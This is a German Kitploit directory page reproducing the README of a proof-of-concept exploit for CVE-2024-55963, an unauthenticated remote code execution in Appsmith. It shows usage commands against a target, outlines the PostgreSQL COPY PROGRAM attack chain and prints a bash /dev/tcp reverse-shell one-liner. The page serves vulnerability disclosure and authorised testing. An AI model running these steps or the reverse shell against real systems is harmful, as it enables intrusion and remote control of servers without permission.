Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-55963 — CVE-2024-55963 ermöglicht eine nicht authentifizierte Remote-Codeausführung auf der Appsmith-Enterprise-Plattform aufgrund einer standardmäßig enthaltenen, falsch konfigurierten PostgreSQL-Datenbank. | Kitploit
Tools/GitHubGitHub/superswan/cve-2024-55963
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsFehlkonfigurationRed TeamingDatenbanksicherheit
GitHubsuperswan/cve-2024-55963

CVE-2024-55963

CVE-2024-55963 ermöglicht eine nicht authentifizierte Remote-Codeausführung auf der Appsmith-Enterprise-Plattform aufgrund einer standardmäßig enthaltenen, falsch konfigurierten PostgreSQL-Datenbank.

23vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE‑2024‑55963 Appsmith RCE PoC

PoC-Exploit für CVE‑2024‑55963, das beliebige Befehle ausführt oder eine Reverse Shell auf verwundbaren Appsmith-Instanzen startet.

Es behandelt automatisch sowohl moderne Server (mit der environmentId-Funktion) als auch ältere „Legacy“-Builds, die vor dieser Funktion existierten, sodass Sie ein einziges Skript für alle Versionen von v1.20 bis zur letzten verwundbaren Version v1.51 verwenden können.


Schnellstart

root@kitploit:~
# Run an arbitrary command (default is `id`)
python3 appsmith-rce.py https://target.example.com [email protected] password123 "whoami"

# spawn a reverse shell
python3 appsmith-rce.py https://target.example.com [email protected] password123 -revshell <ip> <port>

Hinweis: Alle Anmeldedaten funktionieren, solange der Server eine Selbstregistrierung zulässt. Das Skript versucht zuerst, sich anzumelden, und fällt auf die Registrierung zurück, falls das Konto nicht existiert.


Funktionsweise (Überblick)

  1. CSRF- und Sitzungsverwaltung – extrahiert das Token aus mehreren möglichen Endpunkten oder dem Cookie-Jar und trägt es weiter.
  2. Login-/Registrierungsablauf – meldet sich an oder registriert einen neuen Benutzer mit der angegebenen E-Mail / dem Passwort.
  • Workspace-Erkennung – greift auf einen vorhandenen Workspace zu oder löst den Onboarding-Ablauf aus, um automatisch einen zu erstellen.
  • Umgebungserkennung – fragt /api/v1/environments/workspaces/{id} ab; falls nicht vorhanden, wechselt es in den Legacy-Modus (leere environmentId).
  • Anwendungs- und Seiten-Setup – sendet eine POST-Anfrage an /api/v1/applications und extrahiert pageId.
  • Datenquellenerstellung – erstellt eine lokale PostgreSQL-Datenquelle, die auf localhost:5432 mit den Anmeldedaten postgres/postgres zeigt (erlaubt durch die verwundbare Standard-pg_hba.conf).
  • SQL-Objekte – lädt eine Hilfs-PL/pgSQL-Funktion exec_cmd() sowie eine temporäre Tabelle cmd_output hoch, die STDOUT sammelt.
  • Befehlsausführung – führt SELECT * FROM exec_cmd('<your cmd>') über den Endpunkt /api/v1/actions/execute aus
  • Reverse Shell (optional) – führt bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' aus

  • Voraussetzungen

    • Python ≥ 3.8
    • requests

    Getestete Versionen

    Appsmith versionResult
    1.51✅ RCE
    1.45✅ RCE
    1.30✅ RCE, legacy path
    1.52+❌ Gepatched – Funktionserstellung schlägt fehl

    Unterschiede zum PoC von Rhino Security Labs

    Dieser PoC ist eine leichte Verbesserung des Exploits von Rhino Security Labs (mir war nicht bewusst, dass sie bereits einen öffentlichen PoC hatten, als ich die Forschung überprüfte).

    Rhinos PoC verwendet statische Header, Cookies und Anmeldedaten. Beim Testen dieses Exploits traten Probleme auf, wenn auf bestimmten Versionen bereits ein Konto existierte. Dieses Skript ermöglicht es dem Benutzer, eine beliebige E-Mail-/Passwort-Kombination über die Befehlszeile einzugeben. Wie erwähnt, wird das CSRF-Token extrahiert, anstatt auf hartcodierte Werte zurückzugreifen.

    • Diese Version funktioniert auf älteren Servern, die keinen Environments API-Endpunkt haben.
    • Der Ausführungspfad ist anders. Dieser nutzt COPY PROGRAM innerhalb des PL/pgSQL-Wrappers exec_cmd() und verwendet die /actions/execute-API, was jedoch lauter ist. Rhino verlässt sich auf den integrierten Schema-Vorschau-Endpunkt, um eine ad-hoc COPY (SELECT …)-Anweisung auszugeben. Dieser Endpunkt kürzt die Ausgabelänge und fügt zusätzliche Zitierregeln hinzu, sodass lange Befehle oder verkettete Payloads schwerer zu übergeben sind.
    • Einzelnes Reverse-Shell-Flag (:
    • Randomisiert App-/Datenquellen-/Funktionsnamen
    • Keine pyfiglet-Abhängigkeit
    • Unterstützung älterer Server durch automatische Erkennung des environmentId-Headers. Rhinos Exploit nimmt an, dass dieser immer vorhanden ist.

    Zusammen machen diese Designentscheidungen den Exploit kürzer, zuverlässiger und benutzerfreundlicher für den Einsatz in Red Teams, während sie gleichzeitig dieselbe zugrundeliegende Schwachstelle demonstrieren.

    Referenzen

    rhinosecuritylabs.com


    Rechtlicher Hinweis

    Dieser Code wird nur für Bildungszwecke und autorisierte Tests bereitgestellt. Die Ausführung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist wahrscheinlich illegal. Die Autoren übernehmen keine Haftung für Missbrauch.

    Tool herunterladen